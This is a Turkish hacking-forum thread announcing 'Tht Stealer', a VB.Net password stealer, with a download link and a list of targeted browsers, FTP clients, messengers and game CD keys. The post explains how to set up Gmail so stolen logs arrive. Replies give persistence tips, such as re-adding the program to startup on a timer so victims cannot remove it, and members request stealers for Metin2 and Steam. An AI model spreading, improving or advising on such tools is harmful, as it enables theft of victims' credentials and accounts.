Tht Stealer

Combo Fix

Katılımcı Üye
2 Nis 2013
298
0
27
Server açıldığında startupa ekleniyor direkt. Kurban farkedip silmedi takdirde belirlediğin süre aralıklarında sürekli log alabilirsin kardeşim...

Buna çözüm olarak startupa bir timer ile sürekli ekletirseniz örneğin interval 1000 idealdir böyle yaparsanız kalkma ihtimali yoktur :) On Error Resume Next Her daim kullanılmalıdır. [ NOT HIPS TEKNOLOJİSİNDE / UZMAN MOD + MANUAL AYAR İLE KULLANILDIĞINDA PROGRAM ŞÜPHE ÇEKECEKTİR UNUTULMAMALIDIR. ]

Combo Fix

Katılımcı Üye
2 Nis 2013
298
0
27
eline sağlık metin2 de veye knıghtda çalınabilirmi ?

Neden çalınamasın ? Onuda ben yaparım ileri zamanda ancak biraz sorunlarım var o konuda :)
Yönetici izinleri ile bir sıkıntı var :) Bu yüzden onu hallettiğimde bakarız bi çaresine :)
Metin2 stealeri yapmıştım daha önce ben :)

harun4501

Katılımcı Üye
17 Eki 2014
827
0
Neden çalınamasın ? Onuda ben yaparım ileri zamanda ancak biraz sorunlarım var o konuda :)
Yönetici izinleri ile bir sıkıntı var :) Bu yüzden onu hallettiğimde bakarız bi çaresine :)
Metin2 stealeri yapmıştım daha önce ben :)

varrsa elinde paylasımda bulunurmsun yada özelden yollarmısn :D

'AnKeBuT

Kıdemli Üye
31 Ocak 2013
4,365
7
Misyon!!!
Tüm özellikler tek versionda eklenirse ne heyecanı kalır ki? Yavaş yavaş emin adımlarla ilerlemek daha sağlıklı sonuçlara ulaştırır. Güncel versionlarda daha güzel özellikler de gelecek inşallah....

ExSword

Üye
7 Tem 2014
199
0
Süper

+ Üyelik adınız : Cesurbatu

+ Programın ismi : Tht Stealer

+ Programın sürümü : 1.0

+ Kullanılan programlama dili : Vb.Net

+ Programın ve kaynak kodunun adresi: Ben

+ Açıklama : Bu Programda Bir Çok Programın Ve Oyunun Şifresini Çalabilirsiniz.

+ Şifresini Çalabildiği Uygulamalar :
Kod:
CHROME
COREFTP
DYNDNS
FİLEZİLLA
FLASHFXP
FTP COMMANDER
İMVU
MSN
NOİP
PALTALK
PİDGİN
SMARTFTP
İNTERNET EXPLORER
FİREFOX
OPERA
WİNDOWS KEY
VALVE
ACT OF WAR
ANNO 1701
BATTLEFİELD 1942
BATTLEFİELD 2
BATTLEFİELD 2142
BATTLEFİELD VİETNAM
BLACK AND WHİTE
BLACK AND WHİTE 2
CALL OF DUTY
CALL OF DUTY 2
CALL OF DUTY 4
CALL OF DUTY 5
CAC GENERALS
COMMAND AND CONQUER GENERALS ZERO HOUR
COMMAND AND CONQUER TİBERİAN SUN
COMMAND AND CONQUER RED ALERT
COMMAND AND CONQUER RED ALERT 2
COMMAND AND CONQUER RED ALERT 2 YURİ
COMMAND AND CONQUER 3 TİBERİUM WARS
COMPANY OF HEROES
CRYSİS
TECHLAND
FAR CRY
FAR CRY 2
F.E.A.R.
FİFA 08
FRONTLİNES FUEL OF WAR
HELLGATE LONDON
MEDAL OF HONOR AİRBORNE
MEDAL OF HONOR ALLİED ASSAULT
MEDAL OF ALLİED ASSAULT BREAKTH
MEDAL OF ALLİED ASSAULT SPEARHE
NBA 08
NEED FOR SPEED UNDERGROUND
NEED FOR SPEED UNDERGROUND 2
NEED FOR SPEED CARBON
NEED FOR SPEED MOST WANTED
NEED FOR SPEED PRO STREET
QUAKE 4
S.T.A.L.K.E.R. SHADOW OF CHERNOBYL
SWAT 4
UNREAL TOURNAMENT 2004
MİNECRAFT

+ Programı Kullanabilmek İçin : Evet Arkadaşlar Bu Sistem Gmail İle Çalışıyor Fakat Gmail Güvenlik Uyarısı Verdiği İçin Log Gelmiyor. Bu Yüzden Programı Kullanmadan Önce BU LİNKE Girip Etkinleştiri Seçin Ve Sayfayı Kapatın. Artık Programı Kullanmaya Hazırsınız :)

+ Programın ekran görüntüsü :
LokgqG.png

+ Programın İndirme Linki : https://www.mediafire.com/?dhvl04066mybd27

+ Virustotal : https://www.virustotal.com/tr/file/ed52adef53b3e91bdd5649d429e2a56654279c3f99e7cea12708210fee63b8e0/analysis/1417106796/

Eline Sağlık Ama Steam Şifreleride Çalsa Süper Olur Onuda Yap Mütiş Olur Dostum

azimkar69

Yeni üye
18 Şub 2010
1
0
ya ben acemiyim neyim bu programi nasil kullanicaz :)) biri aciklama yapsa mesela su baslik yazan yere ne yazmaliyiz mesaja ne yazcaz lütfen az daha detayli anlatirmisiniz

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.